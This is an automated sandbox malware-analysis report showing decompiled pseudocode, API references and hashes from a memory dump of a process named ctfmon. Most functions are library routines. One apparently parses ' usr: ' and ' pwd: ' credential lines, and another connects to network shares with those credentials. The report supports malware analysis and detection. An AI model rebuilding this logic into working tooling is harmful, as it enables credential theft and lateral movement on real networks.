                                                0x0098195e
                                                0x00981961
                                                0x00981964
                                                0x00981967
                                                0x0098196e
                                                0x00981973
                                                0x00981975
                                                0x00981979
                                                0x00981994
                                                0x00981998
                                                0x00981999
                                                0x0098199c
                                                0x0098199d
                                                0x009819a9
                                                0x0098199f
                                                0x0098199f
                                                0x0098199f
                                                0x0098197b
                                                0x0098197b
                                                0x0098197b
                                                0x00981986
                                                0x0098198b
                                                0x0098198e
                                                0x0098198e
                                                0x00000000
                                                0x00981973
                                                0x009818ca
                                                0x009818cd
                                                0x009818d4
                                                0x009818d9
                                                0x00000000
                                                0x00000000
                                                0x009818e2
                                                0x009818e8
                                                0x009818ea
                                                0x00000000
                                                0x00000000
                                                0x009818ec
                                                0x009818f0
                                                0x00000000
                                                0x00000000
                                                0x00981904
                                                0x0098190a
                                                0x0098190c
                                                0x00981930
                                                0x00981933
                                                0x00000000
                                                0x00981933
                                                0x0098190e
                                                0x00000000
                                                0x0098178a
                                                0x0098178f
                                                0x0098179a
                                                0x0098191b
                                                0x0098191b
                                                0x0098191b
                                                0x0098191e
                                                0x0098191f
                                                0x00000000
                                                0x00981927
                                                0x00981788
                                                0x0098173d
                                                0x00981742
                                                0x00981749
                                                0x0098174f
                                                0x00000000
                                                0x0098174f
                                                0x00981717
                                                0x0098171a
                                                0x00981724
                                                0x00981724
                                                0x00981727
                                                0x0098172a
                                                0x00000000
                                                0x0098172a
                                                0x0098171e
                                                0x00981720
                                                0x00981722
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00981722
                                                0x009816ce
                                                0x009816d3
                                                0x009816db
                                                0x00000000
                                                0x00981666
                                                0x0098166b
                                                0x0098166e
                                                0x00981673
                                                0x00981a00
                                                0x00000000
                                                0x00981a00

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1d6f4b3e65b2279aba99d5e3fde835f16b524e0081275b8205fdac7b9cb27f72
                                                • Instruction ID: b453d9af46a0c6b5d89175dd905cc2c8d424688135accf53c5c4e20cdb1c3d60
                                                • Opcode Fuzzy Hash: 1d6f4b3e65b2279aba99d5e3fde835f16b524e0081275b8205fdac7b9cb27f72
                                                • Instruction Fuzzy Hash: 70C12375E08249AFDF11EFACD851BADBBBCAF49310F184589E404AB392C3758D42CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00980E01 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E00980E01(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E00977D59(_t29, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E00977882(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E00975D0D(GetLastError());
								}
							}
							E00977848(_t40);
							_t14 = _t35;
						} else {
							E00975D0D(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E00975D43())) = 0x16;
						E00975C10();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E00975D43())) = 0x16;
				E00975C10();
				return 0;
			}















                                                0x00980e06
                                                0x00980e0b
                                                0x00980e25
                                                0x00980e28
                                                0x00980e2a
                                                0x00980e43
                                                0x00980e45
                                                0x00980e4c
                                                0x00980e4e
                                                0x00980e57
                                                0x00980e58
                                                0x00980e5c
                                                0x00980e62
                                                0x00980e65
                                                0x00980e67
                                                0x00980e81
                                                0x00980e84
                                                0x00980e86
                                                0x00980e93
                                                0x00980e99
                                                0x00980e9b
                                                0x00980eaf
                                                0x00980eb1
                                                0x00980eb5
                                                0x00980eb5
                                                0x00980eb6
                                                0x00980e9d
                                                0x00980ea4
                                                0x00980ea9
                                                0x00980e9b
                                                0x00980eb9
                                                0x00980ebe
                                                0x00980e69
                                                0x00980e70
                                                0x00980e75
                                                0x00980e75
                                                0x00980e2c
                                                0x00980e31
                                                0x00980e37
                                                0x00980e3c
                                                0x00980e3c
                                                0x00000000
                                                0x00980ec3
                                                0x00980e12
                                                0x00980e18
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24d9a493267f19da0831874d3d50d3eab1c490a01798bfad6ff9a903232291dd
                                                • Instruction ID: 932c0b1c699d082172303da4570c1d9ca717da2e3a434b8e58fd5bf61deedf02
                                                • Opcode Fuzzy Hash: 24d9a493267f19da0831874d3d50d3eab1c490a01798bfad6ff9a903232291dd
                                                • Instruction Fuzzy Hash: E1110273518605AFCB603F758C09A6B3A9CEFC1320B218A15F81DD7381DAB48C0493A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097361C Relevance: 9.0, APIs: 6, Instructions: 48COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0097361C(void* __ecx) {
				void* _t5;
				void* _t6;
				void* _t9;
				void* _t15;
				long _t16;
				void* _t17;
				void* _t20;
				void* _t21;

				if( *0x990450 != 0xffffffff) {
					_t16 = GetLastError();
					_t20 = E00973E33(__eflags,  *0x990450);
					_t9 = _t15;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = E009778D0(_t9, 1, 0x28);
						__eflags = _t21;
						if(__eflags == 0) {
							L6:
							SetLastError(_t16);
							_t17 = 0;
						} else {
							_t6 = E00973E6D(__eflags,  *0x990450, _t21);
							__eflags = _t6;
							if(_t6 != 0) {
								SetLastError(_t16);
								_t17 = _t21;
								_t21 = 0;
								__eflags = 0;
							} else {
								goto L6;
							}
						}
						E00977848(_t21);
						_t5 = _t17;
					} else {
						SetLastError(_t16);
						_t5 = _t20;
					}
					return _t5;
				} else {
					return 0;
				}
			}











                                                0x00973623
                                                0x00973636
                                                0x0097363d
                                                0x0097363f
                                                0x00973640
                                                0x00973642
                                                0x00973658
                                                0x0097365c
                                                0x0097365e
                                                0x00973672
                                                0x00973673
                                                0x00973679
                                                0x00973660
                                                0x00973667
                                                0x0097366e
                                                0x00973670
                                                0x0097367e
                                                0x00973684
                                                0x00973686
                                                0x00973686
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00973670
                                                0x00973689
                                                0x0097368f
                                                0x00973644
                                                0x00973645
                                                0x0097364b
                                                0x0097364b
                                                0x00973693
                                                0x00973625
                                                0x00973627
                                                0x00973627

                                                APIs
                                                • GetLastError.KERNEL32(?,?,00973613,009729D1,0098DD18,00000010,0097219C,?,?,?,?,?,00000000,?), ref: 0097362A
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00973638
                                                • SetLastError.KERNEL32(00000000,00000000,?), ref: 00973645
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorLast$Value___vcrt_
                                                • String ID:
                                                • API String ID: 483936075-0
                                                • Opcode ID: f1f2d42d38c10dcf0c782fb280ba526f23d077fdf8e154bde4e811a459fee3d4
                                                • Instruction ID: cb8dd7b62cc5821b7716960c8744a1b5eb4e3f18f3ba0b28a237b48d534d24fb
                                                • Opcode Fuzzy Hash: f1f2d42d38c10dcf0c782fb280ba526f23d077fdf8e154bde4e811a459fee3d4
                                                • Instruction Fuzzy Hash: 4FF0C83B91D6207BC6211739BC0AA6B2764EBD6B32B22C529F61CDA3E0DF544D01B3D4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009694A0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 202COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E009694A0(void* __ebx, signed int __ecx, signed int __edx, void* __edi, signed int _a4) {
				signed int _v8;
				char _v258;
				char _v264;
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				void* __esi;
				void* __ebp;
				signed int _t60;
				void* _t67;
				intOrPtr _t69;
				void* _t74;
				intOrPtr _t77;
				intOrPtr _t82;
				signed int _t84;
				void* _t88;
				intOrPtr _t90;
				signed int _t91;
				intOrPtr _t93;
				void* _t95;
				intOrPtr _t97;
				void* _t98;
				signed int _t101;
				intOrPtr* _t105;
				intOrPtr* _t106;
				signed int _t107;
				char _t108;
				void* _t110;
				void* _t111;
				intOrPtr* _t112;
				intOrPtr* _t114;
				signed int _t117;
				intOrPtr _t118;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t133;
				void* _t134;

				_t102 = __ecx;
				_t60 =  *0x98f008; // 0x35554c2f
				_v8 = _t60 ^ _t128;
				_t101 = _a4;
				_t117 = __edx;
				_t118 = E00975E17(__ecx, "r");
				_t130 = _t129 + 8;
				_v524 = _t118;
				_t135 = _t118;
				if(_t118 == 0) {
					L37:
					return E00970A5D(_v8 ^ _t128, _t118);
				}
				E00973440(__edx,  &_v264, 0, 0x100);
				_t67 = E00975FE9(_t135,  &_v264, 0x100, _t118);
				_t131 = _t130 + 0x18;
				if(_t67 == 0) {
					L36:
					_push(_t118);
					E00975EA4(_t102, _t152);
					goto L37;
				} else {
					do {
						_t105 =  &_v264;
						_t110 = _t105 + 1;
						do {
							_t69 =  *_t105;
							_t105 = _t105 + 1;
						} while (_t69 != 0);
						_t102 = _t105 - _t110;
						if(_t102 > 0x80 || _t102 < 6) {
							L35:
							_t118 = _v524;
							goto L36;
						} else {
							E009776F4( &_v264, " usr: ", 6);
							_t120 =  ==  ? 1 : 0;
							_t74 = E009776F4( &_v264, " pwd: ", 6);
							_t131 = _t131 + 0x18;
							if(_t74 != 0) {
								__eflags = _t120;
								if(__eflags == 0) {
									goto L35;
								}
								L10:
								E00973440(_t117,  &_v520, 0, 0x100);
								_t106 =  &_v264;
								_t133 = _t131 + 0xc;
								_t111 = _t106 + 1;
								do {
									_t77 =  *_t106;
									_t106 = _t106 + 1;
								} while (_t77 != 0);
								_t102 = _t106 - _t111;
								E00983DB0( &_v520,  &_v258, _t106 - _t111 - 7);
								_t134 = _t133 + 0xc;
								_t121 = _t120 - 1;
								if(_t121 == 0) {
									_t122 = 0;
									__eflags =  *(_t117 + 0x20);
									if(__eflags <= 0) {
										L29:
										_t82 = E00970A6E(_t122, __eflags, 0x100);
										_t112 =  &_v520;
										_v532 = _t82;
										_t134 = _t134 + 4;
										_t124 = _t82 - _t112;
										__eflags = _t124;
										do {
											_t107 =  *_t112;
											_t112 = _t112 + 1;
											 *((char*)(_t124 + _t112 - 1)) = _t107;
											__eflags = _t107;
										} while (_t107 != 0);
										_t102 = _t117;
										_t84 = E00966F70(_t117);
										__eflags = _t84;
										if(_t84 != 0) {
											_t102 =  *(_t117 + 0x20);
											 *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x1c)) +  *(_t117 + 0x20) * 4)) = _v532;
											_t53 = _t117 + 0x20;
											 *_t53 =  *(_t117 + 0x20) + 1;
											__eflags =  *_t53;
										}
										goto L33;
									} else {
										goto L25;
									}
									while(1) {
										L25:
										_t90 = 0;
										__eflags = _t122 -  *(_t117 + 0x20);
										if(_t122 <  *(_t117 + 0x20)) {
											_t90 =  *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x1c)) + _t122 * 4));
										}
										_t102 =  &_v520;
										_t91 = E00977612(_t117, _t122, _t90,  &_v520);
										_t134 = _t134 + 8;
										__eflags = _t91;
										if(_t91 == 0) {
											goto L33;
										}
										_t122 = _t122 + 1;
										__eflags = _t122 -  *(_t117 + 0x20);
										if(__eflags < 0) {
											continue;
										}
										goto L29;
									}
									goto L33;
								}
								_t125 = _t121 - 1;
								if(_t125 != 0) {
									goto L33;
								}
								if( *(_t101 + 0x20) <= _t125) {
									L20:
									_t93 = E00970A6E(_t125, _t149, 0x100);
									_t114 =  &_v520;
									_v528 = _t93;
									_t134 = _t134 + 4;
									_t127 = _t93 - _t114;
									asm("o16 nop [eax+eax]");
									do {
										_t108 =  *_t114;
										_t114 = _t114 + 1;
										 *((char*)(_t127 + _t114 - 1)) = _t108;
									} while (_t108 != 0);
									_t102 = _t101;
									_t95 = E00966F70(_t101);
									_t151 = _t95;
									if(_t95 != 0) {
										_t102 =  *(_t101 + 0x20);
										 *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x1c)) +  *(_t101 + 0x20) * 4)) = _v528;
										 *(_t101 + 0x20) =  *(_t101 + 0x20) + 1;
									}
									goto L33;
								}
								while(1) {
									_t97 = 0;
									if(_t125 <  *(_t101 + 0x20)) {
										_t97 =  *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x1c)) + _t125 * 4));
									}
									_t102 =  &_v520;
									_t98 = E00977612(_t117, _t125, _t97,  &_v520);
									_t134 = _t134 + 8;
									if(_t98 == 0) {
										goto L33;
									}
									_t125 = _t125 + 1;
									_t149 = _t125 -  *(_t101 + 0x20);
									if(_t125 <  *(_t101 + 0x20)) {
										continue;
									}
									goto L20;
								}
								goto L33;
							}
							_t10 = _t74 + 2; // 0x2
							_t120 = _t10;
							goto L10;
						}
						L33:
						E00973440(_t117,  &_v264, 0, 0x100);
						_t118 = _v524;
						_t88 = E00975FE9(_t151,  &_v264, 0x100, _t118);
						_t131 = _t134 + 0x18;
						_t152 = _t88;
					} while (_t88 != 0);
					goto L36;
				}
			}

















































                                                0x009694a0
                                                0x009694a9
                                                0x009694b0
                                                0x009694b4
                                                0x009694bf
                                                0x009694c6
                                                0x009694c8
                                                0x009694cb
                                                0x009694d1
                                                0x009694d3
                                                0x00969721
                                                0x00969731
                                                0x00969731
                                                0x009694e7
                                                0x009694f9
                                                0x009694fe
                                                0x00969503
                                                0x00969718
                                                0x00969718
                                                0x00969719
                                                0x00000000
                                                0x00969510
                                                0x00969510
                                                0x00969510
                                                0x00969518
                                                0x00969520
                                                0x00969520
                                                0x00969522
                                                0x00969523
                                                0x00969527
                                                0x0096952f
                                                0x00969712
                                                0x00969712
                                                0x00000000
                                                0x0096953e
                                                0x0096954c
                                                0x0096955a
                                                0x00969569
                                                0x0096956e
                                                0x00969573
                                                0x0096957a
                                                0x0096957c
                                                0x00000000
                                                0x00000000
                                                0x00969582
                                                0x00969590
                                                0x00969595
                                                0x0096959b
                                                0x0096959e
                                                0x009695a1
                                                0x009695a1
                                                0x009695a3
                                                0x009695a4
                                                0x009695a8
                                                0x009695bc
                                                0x009695c1
                                                0x009695c4
                                                0x009695c7
                                                0x00969660
                                                0x00969662
                                                0x00969665
                                                0x0096968e
                                                0x00969693
                                                0x00969698
                                                0x0096969e
                                                0x009696a6
                                                0x009696ab
                                                0x009696ab
                                                0x009696b0
                                                0x009696b0
                                                0x009696b2
                                                0x009696b5
                                                0x009696b9
                                                0x009696b9
                                                0x009696bd
                                                0x009696bf
                                                0x009696c4
                                                0x009696c6
                                                0x009696c8
                                                0x009696d4
                                                0x009696d7
                                                0x009696d7
                                                0x009696d7
                                                0x009696d7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00969667
                                                0x00969667
                                                0x00969667
                                                0x00969669
                                                0x0096966c
                                                0x00969671
                                                0x00969671
                                                0x00969674
                                                0x0096967c
                                                0x00969681
                                                0x00969684
                                                0x00969686
                                                0x00000000
                                                0x00000000
                                                0x00969688
                                                0x00969689
                                                0x0096968c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096968c
                                                0x00000000
                                                0x00969667
                                                0x009695cd
                                                0x009695d0
                                                0x00000000
                                                0x00000000
                                                0x009695d9
                                                0x0096960b
                                                0x00969610
                                                0x00969615
                                                0x0096961b
                                                0x00969623
                                                0x00969628
                                                0x0096962a
                                                0x00969630
                                                0x00969630
                                                0x00969632
                                                0x00969635
                                                0x00969639
                                                0x0096963d
                                                0x0096963f
                                                0x00969644
                                                0x00969646
                                                0x0096964c
                                                0x00969658
                                                0x0096965b
                                                0x0096965b
                                                0x00000000
                                                0x00969646
                                                0x009695e0
                                                0x009695e0
                                                0x009695e5
                                                0x009695ea
                                                0x009695ea
                                                0x009695ed
                                                0x009695f5
                                                0x009695fa
                                                0x009695ff
                                                0x00000000
                                                0x00000000
                                                0x00969605
                                                0x00969606
                                                0x00969609
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00969609
                                                0x00000000
                                                0x009695e0
                                                0x00969575
                                                0x00969575
                                                0x00000000
                                                0x00969575
                                                0x009696da
                                                0x009696e8
                                                0x009696ed
                                                0x00969700
                                                0x00969705
                                                0x00969708
                                                0x00969708
                                                0x00000000
                                                0x00969710

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: pwd: $ usr: $/LU5/
                                                • API String ID: 0-1805602843
                                                • Opcode ID: fad7d1ef0b1ffbd5f227ff694a3569f4dbb9ff7e43839f427671591ef3961707
                                                • Instruction ID: f810b777022b6950138e769083fedc9e68455684e216f5f2cca87d00083a278d
                                                • Opcode Fuzzy Hash: fad7d1ef0b1ffbd5f227ff694a3569f4dbb9ff7e43839f427671591ef3961707
                                                • Instruction Fuzzy Hash: 3D61C4B29003159BCF25EF60CD85BE9B7BCBF49304F0581A5ED49AB242E671EE45CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00966100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E00966100(unsigned int __ecx, unsigned int __edx, signed int _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				unsigned int _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t34;
				signed int _t37;
				void* _t40;
				intOrPtr _t42;
				signed int _t44;
				intOrPtr _t45;
				signed int _t50;
				signed int _t54;
				unsigned int _t58;
				signed int _t59;
				signed int _t66;
				signed int _t72;
				signed int _t75;
				signed int _t80;
				intOrPtr _t81;

				_t68 = __edx;
				_t62 = __ecx;
				_push(0xffffffff);
				_push(E009845D0);
				_push( *[fs:0x0]);
				_t81 = _t80 - 0xc;
				_push(_t58);
				_t34 =  *0x98f008; // 0x35554c2f
				_push(_t34 ^ _t80);
				 *[fs:0x0] =  &_v16;
				_v20 = _t81;
				_t75 = __ecx;
				_v24 = __ecx;
				_t37 = _a4;
				_t72 = _t37 | 0x0000000f;
				if(_t72 <= 0xfffffffe) {
					_t58 =  *(__ecx + 0x14);
					_t62 = _t58 >> 1;
					_t68 = 0xaaaaaaab * _t72 >> 0x20 >> 1;
					__eflags = _t62 - 0xaaaaaaab * _t72 >> 0x20 >> 1;
					if(_t62 > 0xaaaaaaab * _t72 >> 0x20 >> 1) {
						_t72 = _t62 + _t58;
						__eflags = _t58 - 0xfffffffe - _t62;
						if(_t58 > 0xfffffffe - _t62) {
							_t72 = 0xfffffffe;
						}
					}
				} else {
					_t72 = _t37;
				}
				_t11 = _t72 + 1; // 0xffffffff
				_t40 = _t11;
				_v8 = 0;
				if(_t40 != 0) {
					__eflags = _t40 - 0xffffffff;
					if(__eflags > 0) {
						_t40 = E00971283(__eflags);
					}
					__eflags = _t40 - 0x1000;
					if(__eflags < 0) {
						_t59 = E00970A6E(_t75, __eflags, _t40);
						_t81 = _t81 + 4;
						__eflags = _t59;
						if(__eflags != 0) {
							goto L17;
						} else {
							E00975C20(_t59, _t62, _t68, _t72, __eflags);
							_t50 = _a4;
							_a4 = _t50;
							__eflags = _t50 + 1;
							_v20 = _t81;
							_v8 = 2;
							_v28 = E00966440(_t59, _t68, _t72, _t75, _t50 + 1);
							return E009661E5;
						}
					} else {
						_t13 = _t40 + 0x23; // 0x23
						_t67 = _t13;
						__eflags = _t13 - _t40;
						if(__eflags <= 0) {
							E00971283(__eflags);
						}
						_t54 = E00970A6E(_t75, __eflags, _t67);
						_t81 = _t81 + 4;
						__eflags = _t54;
						if(__eflags == 0) {
							_t54 = E00975C20(_t58, _t67, _t68, _t72, __eflags);
						}
						_t14 = _t54 + 0x23; // 0x23
						_t59 = _t14 & 0xffffffe0;
						 *(_t59 - 4) = _t54;
						goto L17;
					}
				} else {
					_t59 = 0;
					L17:
					_t42 = _a8;
					if(_t42 != 0) {
						if( *(_t75 + 0x14) < 0x10) {
							_t66 = _t75;
						} else {
							_t66 =  *_t75;
						}
						if(_t42 != 0) {
							E00983DB0(_t59, _t66, _t42);
						}
					}
					_t43 =  *(_t75 + 0x14);
					if( *(_t75 + 0x14) >= 0x10) {
						E00965CF0(_t59, _t68, _t72,  *_t75, _t43 + 1);
					}
					 *(_t75 + 0x14) = 0xf;
					 *((intOrPtr*)(_t75 + 0x10)) = 0;
					if( *(_t75 + 0x14) < 0x10) {
						_t44 = _t75;
					} else {
						_t44 =  *_t75;
					}
					 *_t44 = 0;
					_t45 = _a8;
					 *_t75 = _t59;
					 *(_t75 + 0x14) = _t72;
					 *((intOrPtr*)(_t75 + 0x10)) = _t45;
					if( *(_t75 + 0x14) >= 0x10) {
						_t75 = _t59;
					}
					 *((char*)(_t75 + _t45)) = 0;
					 *[fs:0x0] = _v16;
					return _t45;
				}
			}



























                                                0x00966100
                                                0x00966100
                                                0x00966103
                                                0x00966105
                                                0x00966110
                                                0x00966111
                                                0x00966114
                                                0x00966117
                                                0x0096611e
                                                0x00966122
                                                0x00966128
                                                0x0096612b
                                                0x0096612d
                                                0x00966130
                                                0x00966135
                                                0x0096613b
                                                0x00966141
                                                0x0096614d
                                                0x0096614f
                                                0x00966151
                                                0x00966153
                                                0x0096615a
                                                0x0096615f
                                                0x00966161
                                                0x00966163
                                                0x00966163
                                                0x00966161
                                                0x0096613d
                                                0x0096613d
                                                0x0096613d
                                                0x00966168
                                                0x00966168
                                                0x0096616b
                                                0x00966174
                                                0x0096617a
                                                0x0096617d
                                                0x0096617f
                                                0x0096617f
                                                0x00966184
                                                0x00966189
                                                0x009661ba
                                                0x009661bc
                                                0x009661bf
                                                0x009661c1
                                                0x00000000
                                                0x009661c3
                                                0x009661c3
                                                0x009661c8
                                                0x009661cb
                                                0x009661ce
                                                0x009661cf
                                                0x009661d3
                                                0x009661dc
                                                0x009661e4
                                                0x009661e4
                                                0x0096618b
                                                0x0096618b
                                                0x0096618b
                                                0x0096618e
                                                0x00966190
                                                0x00966192
                                                0x00966192
                                                0x00966198
                                                0x0096619d
                                                0x009661a0
                                                0x009661a2
                                                0x009661a4
                                                0x009661a4
                                                0x009661a9
                                                0x009661ac
                                                0x009661af
                                                0x00000000
                                                0x009661af
                                                0x00966176
                                                0x00966176
                                                0x009661ee
                                                0x009661ee
                                                0x009661f3
                                                0x009661f9
                                                0x009661ff
                                                0x009661fb
                                                0x009661fb
                                                0x009661fb
                                                0x00966203
                                                0x00966208
                                                0x0096620d
                                                0x00966203
                                                0x00966210
                                                0x00966216
                                                0x0096621c
                                                0x0096621c
                                                0x00966221
                                                0x00966228
                                                0x00966233
                                                0x00966239
                                                0x00966235
                                                0x00966235
                                                0x00966235
                                                0x0096623b
                                                0x0096623e
                                                0x00966241
                                                0x00966243
                                                0x00966246
                                                0x0096624d
                                                0x0096624f
                                                0x0096624f
                                                0x00966251
                                                0x00966258
                                                0x00966266
                                                0x00966266

                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 0096617F
                                                  • Part of subcall function 00971283: __CxxThrowException@8.LIBVCRUNTIME ref: 0097129A
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00966192
                                                • new.LIBCMT ref: 00966198
                                                • new.LIBCMT ref: 009661B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                • String ID: /LU5/
                                                • API String ID: 3339364867-937868281
                                                • Opcode ID: 44a191321cf522a77e2dc124d8d3b528643bbb5cdda6ea6d270e026885603273
                                                • Instruction ID: 0fa7cb779ef5c5089150892b0024fc0d51622900f1353ad1088d52649dcbf265
                                                • Opcode Fuzzy Hash: 44a191321cf522a77e2dc124d8d3b528643bbb5cdda6ea6d270e026885603273
                                                • Instruction Fuzzy Hash: CD411471A047019FDB24DF68C88171ABBE8EB42710F510A2EE866C7382D775EA44C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096B0F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78shareCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 70%
                                                			E0096B0F0(intOrPtr* __ecx, char* __edx, void* __edi, char* _a4) {
				signed int _v8;
				char _v276;
				char _v540;
				char* _v560;
				int _v576;
				struct _NETRESOURCE _v580;
				char* _v584;
				char* _v588;
				void* __esi;
				signed int _t23;
				intOrPtr* _t26;
				char _t42;
				intOrPtr* _t51;
				void* _t56;
				long _t57;
				void* _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;
				signed int _t63;

				_t62 = (_t60 & 0xfffffff0) - 0x248;
				_t23 =  *0x98f008; // 0x35554c2f
				_v8 = _t23 ^ _t62;
				_t51 = __ecx;
				_v584 = _a4;
				_v588 = __edx;
				_t26 = __ecx;
				_t56 =  &_v540 - __ecx;
				do {
					_t42 =  *_t26;
					_t26 = _t26 + 1;
					 *((char*)(_t56 + _t26 - 1)) = _t42;
				} while (_t42 != 0);
				E0096A2B0( &_v540);
				E00963F90( &_v540,  &_v276, "\\\\%s",  &_v540);
				_t63 = _t62 + 0xc;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x20], xmm0");
				_v560 =  &_v276;
				asm("movaps [esp+0x18], xmm0");
				_v576 = 0;
				_t57 = WNetAddConnection2A( &_v580, _v584, _v588, 0);
				if(_t57 != 0) {
					if(_t57 != 0x4c3) {
						L6:
						SetLastError(_t57);
						_pop(_t58);
						return E00970A5D(_v8 ^ _t63, _t58);
					} else {
						E0096B1F0(_t51, _t57);
						_t57 = WNetAddConnection2A( &_v580, _v584, _v588, 0);
						if(_t57 == 0) {
							goto L3;
						} else {
							goto L6;
						}
					}
				} else {
					L3:
					_pop(_t59);
					return E00970A5D(_v8 ^ _t63, _t59);
				}
			}























                                                0x0096b0f6
                                                0x0096b0fc
                                                0x0096b103
                                                0x0096b10f
                                                0x0096b111
                                                0x0096b119
                                                0x0096b11d
                                                0x0096b11f
                                                0x0096b121
                                                0x0096b121
                                                0x0096b123
                                                0x0096b126
                                                0x0096b12a
                                                0x0096b132
                                                0x0096b149
                                                0x0096b14e
                                                0x0096b158
                                                0x0096b15b
                                                0x0096b160
                                                0x0096b16e
                                                0x0096b177
                                                0x0096b186
                                                0x0096b18a
                                                0x0096b1a8
                                                0x0096b1cc
                                                0x0096b1cd
                                                0x0096b1dd
                                                0x0096b1e8
                                                0x0096b1aa
                                                0x0096b1ac
                                                0x0096b1c6
                                                0x0096b1ca
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096b1ca
                                                0x0096b18c
                                                0x0096b18c
                                                0x0096b18f
                                                0x0096b1a1
                                                0x0096b1a1

                                                APIs
                                                • WNetAddConnection2A.MPR(?), ref: 0096B180
                                                • SetLastError.KERNEL32(00000000), ref: 0096B1CD
                                                  • Part of subcall function 0096B1F0: WNetCancelConnection2A.MPR(?,00000000,00000001), ref: 0096B24E
                                                • WNetAddConnection2A.MPR(?,?,?,00000000), ref: 0096B1C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Connection2$CancelErrorLast
                                                • String ID: /LU5/$\\%s
                                                • API String ID: 4062109977-2245926631
                                                • Opcode ID: d8111f66b52498950c55e6ae2d26dacf00fbac322f55668a978b715dae2d45b4
                                                • Instruction ID: 1884472f1a48aa1ebf292cf4d23f5539be1f5e71fac5e5eb13cf01e627b2b413
